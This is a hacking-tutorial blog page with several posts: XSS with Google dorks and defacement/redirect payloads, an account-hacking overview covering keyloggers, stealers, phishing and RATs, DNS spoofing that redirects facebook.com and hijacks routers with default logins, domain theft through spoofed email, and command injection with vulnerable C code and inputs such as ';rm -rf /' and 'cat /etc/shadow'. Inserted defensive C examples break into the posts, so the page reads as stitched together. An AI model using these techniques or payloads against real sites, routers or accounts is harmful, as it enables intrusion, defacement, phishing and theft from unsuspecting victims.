Welcome to Cyber Smart Zone ~ Software Zone ~


Friday, 17 May 2013

[TUT] Cross Site Scripting ( XSS )Tutorial

Hey guys, I'm just sharing a simple XSS tutorial that I found informative. I hope it'll be helpful.
Cross-site scripting (XSS) is a type of website security vulnerability, typically found in web applications, that enables attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same-origin policy.

Types of XSS vulnerabilities:

1. Persistent
2. Non-persistent

In this post, I'll explain the non-persistent vulnerability. I'll write about persistent XSS later.
Non-persistent (reflected) XSS is the most common type of XSS flaw. It is a server-side vulnerability:
when a web server takes input from a user and returns that same input back to the user without any validation or output encoding, this leads to a non-persistent XSS vulnerability.
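Added example (not from the tutorial or the site it came from): the server-side fix for the reflected flaw just described, in C. The server still echoes the submitted text, but encodes it first; html_escape and reflect_search are names chosen here, and the input is the tutorial's own probe string.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Entity for each byte that has meaning to the HTML parser; NULL otherwise. */
static const char *entity_for(char c) {
    switch (c) {
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '&':  return "&amp;";
    case '"':  return "&quot;";
    case '\'': return "&#39;";
    default:   return NULL;
    }
}

/* Return a malloc'd copy of in with HTML metacharacters encoded in a single
   pass (so '&' is never double-encoded). Caller frees; NULL on allocation failure. */
char *html_escape(const char *in) {
    size_t out_len = 0;
    for (const char *p = in; *p; p++) {
        const char *e = entity_for(*p);
        out_len += e ? strlen(e) : 1;
    }
    char *out = malloc(out_len + 1), *w = out;
    if (!out) return NULL;
    for (const char *p = in; *p; p++) {
        const char *e = entity_for(*p);
        if (e) { size_t n = strlen(e); memcpy(w, e, n); w += n; }
        else    *w++ = *p;
    }
    *w = '\0';
    return out;
}

/* The reflection the tutorial describes: the server echoes the submitted text
   into the page. Encoding it before insertion makes the browser render the
   "<script>" as literal text instead of executing it. Caller frees the result. */
char *reflect_search(const char *term) {
    char *safe = html_escape(term);
    if (!safe) return NULL;
    static const char fmt[] = "<p>You searched for: %s</p>";
    size_t n = sizeof fmt + strlen(safe);   /* sizeof counts the NUL, so this is enough */
    char *page = malloc(n);
    if (page) snprintf(page, n, fmt, safe);
    free(safe);
    return page;
}

int main(void) {
    /* Constructed input: the tutorial's own probe payload. */
    char *page = reflect_search("<script>alert(\"Pakbugs.com\");</script>");
    if (page) { puts(page); free(page); }
    return 0;
}
```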

What an attacker can do with XSS:

XSS attacks can be used for the following:

• Compromising and hijacking accounts
• Stealing user cookies
• Defacing websites
• Phishing attacks
• Posting hostile content


Instructions:
Step 1: First of all, find the vulnerability using Google dorks. You can find dorks online.
The most commonly used dorks are as follows:
Code:
inurl:com_feedpostold/feedpost.php?url=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=Search&k=
Step 2: Choose a target website.

Step 3: Attack.

Finding the vulnerability:

1) Find a textbox in the site, or something else where you can submit text.


2) Type in the following and hit the Submit Query button.


Code:
<script>alert("Pakbugs.com");</script>


3) If the web page gives a pop-up with the message "Pakbugs.com", the input is reflected unencoded and the site is vulnerable.


Defacing:

There are a few ways to deface a site once you find an XSS vulnerability.


1) Make a picture pop up:


Code:
<script>location="www.website.com/yourdefacepic";</script>


2) Replace The Content Of The Page By An Image:


Code:
<img src="yoursite.com/yourdefacepic">


3)Redirect To A Website


Code:
<script>window.location="http://www.yoursite.com"</script>

You've done it all. Hope it'll help you a lot.

[Article] Introduction to Hacking Email or Website Accounts.

You CANNOT hack emails or websites with just one or two clicks using some email hacking app. You need to have proper information about the person that you are hacking. If you see sites that claim they can hack email accounts within minutes and charge hundreds of dollars for it, just laugh at them and move on. Do not waste money on them, as they will just be scamming you.

There are two ways to hack accounts on a website.

Client Side Hacking

This method depends on what you choose. Client-side hacking is basically hacking the person's PC and extracting information. Antiviruses will detect the APIs, assemblies, etc. and prevent you from infecting them. In this case you need

1) Keylogging : This basically taps all the keystrokes that the user types. When the user types a password, you get it. The victim has to execute the keylogger "server" file in order to be infected.

2) Password Stealing : Here you steal passwords saved on the user's PC. Browsers often save passwords to give the user a quick login, but this can be harmful sometimes. Here, as with keyloggers, you need to execute a file on the client PC. You can use a combination of keylogger and password stealer, such as my Emissary Keylogger/Stealer.

3) Cookie Stealing : Here you are stealing the user's cookies. Cookies can be used to auto-login, as they hold information about the account.

4) Remote Administration Tools : These tools are very dangerous and give you full control of a computer. You can view webcams and desktops live, and transfer and download files.

5) Social Engineering : Social engineering is nothing but fooling someone into downloading your malware or extracting sensitive information from them.
One of the methods is this: Hacking Accounts through SE.


6) Phishing Attacks : Phishing is creating a fake login page similar to a website's login page and then fooling the person into entering their username and password into the login box. The triggered PHP scripts then send the entered passwords to your log file.

7) Zombies/Bots : This is like keylogging and password stealing: if the victim executes your malware, he or she can be infected with a bot. A bot will connect them to your IRC channel or host server and make them your "zombie". You can do whatever you want with them.

That covers the client part. 


Server Side Hacking


1) Exploiting : Exploiting means finding a vulnerability and using it to your advantage. There are various publicly disclosed vulnerabilities and exploits that you can simply search for on Google and HC. There are several ways to exploit a server; the most common ones are:

1) XSS Cross Site Scripting,
2) RFI, LFI 
3) Uploading Shells
4) SQL Injections
5) CSRF 
6) Gaining Root Access to websites hosted on the same server and then intruding another site on the server.
7) Using scripts to gain information, known as exploits.

These methods are very vast and cannot be explained in a few lines so I am not explaining them in this guide.


2) Bruteforce Attack : Bruteforcing is using bruteforcer software to try combinations of words, numbers and symbols to find the login of your victim. But this rarely works, and you need to have a powerful computer.

3) Reverting Accounts : Here we are fooling the website's servers into believing that we are the authorized user and holder of the account. One such vulnerability exists in Hotmail and existed in Facebook. Users just supplied some information about the account, such as the last accessed IP address, contacts on the contact list, date of birth, location, etc. With a bit of SE it's not that hard to extract such information from the client.

That covers most of the basics of Email/Website Account "Hacking". Hope you don't buy into any of the bullshit after reading this guide.      



LOVE YOU ALL <3

[TUT] DNS Spoofing On Linux (Local Machine) Tutorial

This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.
To start, you’ll need
• A computer running Linux (Ubuntu in my case)
• A basic understanding of how the Domain Name System (DNS) works.
Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.


Why DNS?


The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.
If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.


Malicious DNS Server


So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.
The server I’ve selected is dnsmasq; it’s lightweight and the only one that works for this purpose (that I’ve found).
To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.


Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)


sudo gedit /etc/dnsmasq.conf


The values in there should be sufficient for most purposes. What we want to do is hard-code IPs for certain hosts we want to spoof.


The format for this is address=/HOST/IP


So, for example:


address=/facebook.com/63.63.63.63


where 63.63.63.63 is the IP of your malicious web server.


Save the file and restart dnsmasq by running


sudo /etc/init.d/dnsmasq restart


You now have a DNS server running which will redirect requests for facebook.com to 63.63.63.63
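As an added example (not part of the original post), here is a small C audit for the address=/HOST/IP directive just described: it parses a constructed dnsmasq.conf and reports which names the resolver has been told to answer with a fixed address, which is the check to run on any resolver you did not set up yourself. SAMPLE_CONF, parse_address_line and find_override are names chosen here; the multi-name and empty-IP forms handled are dnsmasq's own syntax.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX_HOSTS 8
#define NAME_LEN 128
/* Constructed sample config: an ordinary option, a redirect like the
   tutorial's, and an empty-IP entry (dnsmasq answers NXDOMAIN for it). */
static const char SAMPLE_CONF[] =
    "# dnsmasq.conf (constructed sample)\n"
    "domain-needed\n"
    "address=/facebook.com/63.63.63.63\n"
    "address=/ads.example/\n";

/* Parse one address=/host1/.../hostN/IP line (several names and an empty IP
   are allowed). Copies the names into hosts and the target into ip; returns
   the number of names, or -1 if the line is not an address= directive. */
int parse_address_line(const char *line, char hosts[][NAME_LEN], char *ip, size_t iplen) {
    const char *p = line, *slash;
    int n = 0;
    while (*p == ' ' || *p == '\t') p++;
    if (strncmp(p, "address=/", 9) != 0) return -1;
    p += 9;
    while ((slash = strchr(p, '/')) != NULL) {
        size_t len = (size_t)(slash - p);
        if (n < MAX_HOSTS && len > 0 && len < NAME_LEN) {
            memcpy(hosts[n], p, len);
            hosts[n++][len] = '\0';
        }
        p = slash + 1;
    }
    size_t len = strcspn(p, " \t\r\n#");  /* target ends at blank or comment */
    if (len >= iplen) len = iplen - 1;
    memcpy(ip, p, len);
    ip[len] = '\0';
    return n;
}

/* Scan the whole config for a line redirecting host: returns a malloc'd copy
   of the target ("" means NXDOMAIN) or NULL if the name is untouched. */
char *find_override(const char *conf, const char *host) {
    char line[512], hosts[MAX_HOSTS][NAME_LEN], ip[64];
    for (const char *p = conf; *p; ) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len < sizeof line) {                   /* overlong lines are skipped */
            memcpy(line, p, len);
            line[len] = '\0';
            int n = parse_address_line(line, hosts, ip, sizeof ip);
            for (int i = 0; i < n; i++)
                if (strcmp(hosts[i], host) == 0) {
                    char *out = malloc(strlen(ip) + 1);
                    if (out) strcpy(out, ip);
                    return out;
                }
        }
        if (!nl) break;
        p = nl + 1;
    }
    return NULL;
}

int main(void) {
    const char *watch[] = { "facebook.com", "ads.example", "example.org" };
    for (int i = 0; i < 3; i++) {
        char *ip = find_override(SAMPLE_CONF, watch[i]);
        printf("%-14s %s\n", watch[i], !ip ? "not overridden" : ip[0] ? ip : "NXDOMAIN");
        free(ip);
    }
}
```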


Malicious Web Server


You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.


There are a couple of things you can do with the web server. It will be getting all the traffic intended for the original website, so the most likely course of action would be to set up some sort of phishing site.


I’ll presume you know how to do that though


Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.


I Can Be Your DNS Server Plz?


An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that


But how do you get a slave? Well, this is where my project, the IP Experiment, could come in handy.


If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and, more often than not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; it’s fairly easy to log in and change the DNS settings.



LOVE YOU ALL <3

[Article] Website Hacking Techniques

1) What is Website defacement ?

A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.

A high-profile website defacement was carried out on the website of the company SCO Group following its assertion that Linux contained stolen code. The title of the page was changed from "Red Hat vs SCO" to "SCO vs World," with various satirical content following.

2) Terms used ---->

[SQL] - Structured Query Language
[LFI] - Local File Include
[RFI] - Remote File Include
[XSS] - Cross Site Scripting
[RCE] - Remote Code Execution
[AFD] - Arbitrary File Download
[SCD] - Source Code Disclosure
[PCI] - PHP Code Injection

3) Defacement techniques

I).Domain Hacking
II).FTP Protocol
III).Apache Vulnerable
IV).Script, Cookie, XSS
V).Social Engineering.
VI).SQL Injection
VII).RFI.


Now :-

I) What is Domain Hacking ?

Domain hacking is the process of transferring a domain (yahoo.com) without the owner's permission, with the help of phishing, sniffing or spoofing.

A domain hack is an unconventional domain name that combines domain levels, especially the top-level domain (TLD), to spell out the full "name" or title of the domain, making a kind of fun.


-------> Domain hacking process :--->

a) Look at the who.is record of the slave (XXABCXX.net) DNS record and note
down the admin email (xxabcxx@gmail/ymail/hotmail/live/[whatever applies; use this exception if possible: admin(name)@XXABCXX.net]).
b) Send a spoofed mail to the slave admin email asking for the password.
c) Then open the domain registrar (my.india s.com), the website used to access
their domain control panel, and click "forgot password".
d) After that you get a password in the slave email address for the slave domain.
e) Just log in to the domain control panel.
f) Get the ECCP code, create a new account with a hosting company
and choose domain transfer (submit all details).
g) You get all rights to this domain for a lifetime.



II) What is FTP Protocol ?

The File Transfer Protocol (FTP) provides the basic elements of file sharing between hosts. FTP uses TCP to create a virtual connection for control information and then creates a separate TCP connection for data transfers. The control connection uses an image of the TELNET protocol to exchange commands and messages between hosts.
For details, check this: Detail about FTP

III) What is XSS ?

XSS is a type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users.
Cross-site scripting is a technique used to add script to a trusted site that will be executed in other users' browsers. A key element of XSS is that one user can submit data to a website that will later be displayed to other users. It is necessary that the bad guy NOT mess up the HTML structure, otherwise the result will be web defacement rather than attacking other users.

IV) What is Social Engineering ?

Social engineering is the act of manipulating people into performing actions or exposing confidential information. It's trickery or deception to gather information, commit fraud, or gain computer system access, where the hacker never comes face-to-face with the slave.
I don't want to make my thread too big, so I helped myself with this:
LINK

V) What is SQL injection ?

SQL injection is a type of security exploit in which the attacker injects Structured Query Language (SQL) code through a web form input box to gain access to resources or make changes to data.
It is a technique of injecting SQL commands to exploit non-validated input vulnerabilities in a web application's database.

-------------->Preventing SQL Injection<-------------------
To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parameterized statements must be used (preferred), or user input must be carefully escaped or filtered.


VI) What is RFI ?

Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own (malicious) code in the space provided for PHP programs on a web page.



love you all <3

[TUT] Command Injection Tutorial

The purpose of a command injection attack is to inject and execute commands specified by the attacker in the vulnerable application. In a situation like this, the application, which executes unwanted system commands, acts like a pseudo system shell, and the attacker may use it as any authorized system user would. However, the commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of a lack of correct validation of input data that the attacker can manipulate (forms, cookies, HTTP headers, etc.).

Command injection is a variant of the code injection attack. The difference is that in code injection the attacker adds his own code to the existing code, extending the default functionality of the application without needing to execute system commands. Injected code is likewise executed with the same privileges and environment as the application has.

An OS command injection attack occurs when an attacker attempts to execute system level commands through a vulnerable application. Applications are considered vulnerable to the OS command injection attack if they utilize user input in a system level command. 

Example 1

The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard output. It is also injectable:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv) {
    char cat[] = "cat ";
    char *command;
    size_t commandLength;

    if (argc != 2) {
        fprintf(stderr, "usage: %s FILE\n", argv[0]);
        return 1;
    }

    /* Build "cat <argv[1]>" and hand the whole string to /bin/sh via system(). */
    commandLength = strlen(cat) + strlen(argv[1]) + 1;
    command = (char *) malloc(commandLength);
    if (command == NULL) return 1;
    strncpy(command, cat, commandLength);
    strncat(command, argv[1], (commandLength - strlen(cat)));

    /* The shell interprets ';', '|', '&' and so on inside argv[1], so extra commands run. */
    system(command);
    free(command);
    return 0;
}

Used normally, the output is simply the contents of the file requested:


$ ./catWrapper Story.txt
When last we left our heroes...

However, if we add a semicolon and another command to the end of this line, the command is executed by catWrapper with no complaint:

$ ./catWrapper "Story.txt; ls"
When last we left our heroes...
Story.txt doubFree.c nullpointer.c
unstosig.c www* a.out*
format.c strlen.c useFree*
catWrapper* misnull.c strlength.c useFree.c
commandinjection.c nodefault.c trunc.c writeWhatWhere.c

If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege.
Example 2

The following simple program accepts a filename as a command line argument, and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define CMD_MAX 256

int main(int argc, char **argv) {
    char cmd[CMD_MAX] = "/usr/bin/cat ";
    if (argc != 2) return 1;      /* added so a missing argument does not crash */
    strcat(cmd, argv[1]);         /* unbounded append, then handed to a shell */
    system(cmd);                  /* runs as root when installed setuid root */
}

Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form ";rm -rf /", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition.
Example 3

The following code from a privileged program uses the environment variable $APPHOME to determine the application's installation directory, and then executes an initialization script in that directory.

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define INITCMD "/init.sh"  /* assumed name of the init script appended to $APPHOME */

int main(void) {
    /* ... */
    char* home = getenv("APPHOME");
    if (home == NULL) return 1;                                      /* getenv may return NULL */
    char* cmd = (char*)malloc(strlen(home) + strlen(INITCMD) + 1);  /* +1 for the terminating NUL */
    if (cmd) {
        strcpy(cmd, home);
        strcat(cmd, INITCMD);
        execl(cmd, cmd, (char*)NULL);  /* path is taken straight from the caller's environment */
    }
    /* ... */
    return 1;
}

As in Example 2, the code in this example allows an attacker to execute arbitrary commands with the elevated privilege of the application. In this example, the attacker can modify the environment variable $APPHOME to specify a different path containing a malicious version of INITCMD. Because the program does not validate the value read from the environment, by controlling the environment variable, the attacker can fool the application into running malicious code.

The attacker is using the environment variable to control the command that the program invokes, so the effect of the environment is explicit in this example. We will now turn our attention to what can happen when the attacker changes the way the command is interpreted.
Example 4

The code below is from a web-based CGI utility that allows users to change their passwords. The password update process under NIS includes running make in the /var/yp directory. Note that since the program updates password records, it has been installed setuid root.

The program invokes make as follows:

system("cd /var/yp && make &> /dev/null");

Unlike the previous examples, the command in this example is hardcoded, so an attacker cannot control the argument passed to system(). However, since the program does not specify an absolute path for make, and does not scrub any environment variables prior to invoking the command, the attacker can modify their $PATH variable to point to a malicious binary named make and execute the CGI script from a shell prompt. And since the program has been installed setuid root, the attacker's version of make now runs with root privileges.

The environment plays a powerful role in the execution of system commands within programs. Functions like system() and exec() use the environment of the program that calls them, and therefore attackers have a potential opportunity to influence the behavior of these calls.

Example 5

The following trivial code snippets are vulnerable to OS command injection on the Unix/Linux platform:

C: 

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char command[256];

    if(argc != 2) {
        printf("Error: Please enter a program to time!\n");
        return -1;
    }

    memset(command, 0, sizeof(command));

    /* "time ./<argv[1]>" is built by plain concatenation and handed to a shell. */
    strcat(command, "time ./");
    strcat(command, argv[1]);

    system(command);
    return 0;
}

If this were a suid binary, consider the case when an attacker enters the following: 'ls; cat /etc/shadow'. In the Unix environment, shell commands are separated by a semicolon. We can now execute system commands at will!
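Added example, not from the OWASP text this tutorial reproduces: a hardened rewrite of the catWrapper from Example 1 in C that also closes the environment routes of Examples 3 and 4 by executing a fixed absolute path with a fixed environment and never invoking a shell. is_safe_filename and safe_cat are names chosen here; /bin/cat is assumed to be where cat lives.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list the argument: a plain file name made of [A-Za-z0-9._-] that does
   not start with '-' (no cat options) or '.' (no hidden files, no ".."). The
   shell metacharacters from Examples 1, 2 and 5 (';', '|', '&', ' ') and any
   '/' are rejected outright. */
int is_safe_filename(const char *name) {
    size_t len = name ? strlen(name) : 0;
    if (len == 0 || len > 255 || name[0] == '-' || name[0] == '.') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Hardened catWrapper: no system(), so no shell ever parses the input. The
   program is run by absolute path with a fixed environment, which closes the
   $APPHOME (Example 3) and $PATH (Example 4) routes as well. Returns cat's
   exit status, or -1 if the name was rejected or the child could not start. */
int safe_cat(const char *name) {
    if (!is_safe_filename(name)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const args[] = { "/bin/cat", "--", (char *)name, NULL };
        char *const env[]  = { "PATH=/usr/bin:/bin", NULL };
        execve(args[0], args, env);   /* "--" ends option parsing in cat */
        _exit(127);                   /* only reached if execve itself failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s FILE\n", argv[0]);
        return 2;
    }
    int rc = safe_cat(argv[1]);
    if (rc == -1) fprintf(stderr, "rejected: %s\n", argv[1]);
    return rc == -1 ? 2 : rc;
}
```

Run with "Story.txt; ls" or ";rm -rf /" as the argument and the name is refused before any process is started, whereas the original wrapper passed both to /bin/sh.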

Java: 

There are many sites that will tell you that Java's Runtime.exec is exactly the same as C's system function. This is not true. Both allow you to invoke a new program/process. However, C's system function passes its arguments to the shell (/bin/sh) to be parsed, whereas Runtime.exec tries to split the string into an array of words, then executes the first word in the array with the rest of the words as parameters. Runtime.exec does NOT try to invoke the shell at any point. The key difference is that much of the functionality provided by the shell that could be used for mischief (chaining commands using "&", "&&", "|", "||", etc, redirecting input and output) would simply end up as a parameter being passed to the first command, and likely causing a syntax error, or being thrown out as an invalid parameter. 


Remember me In your prayers <3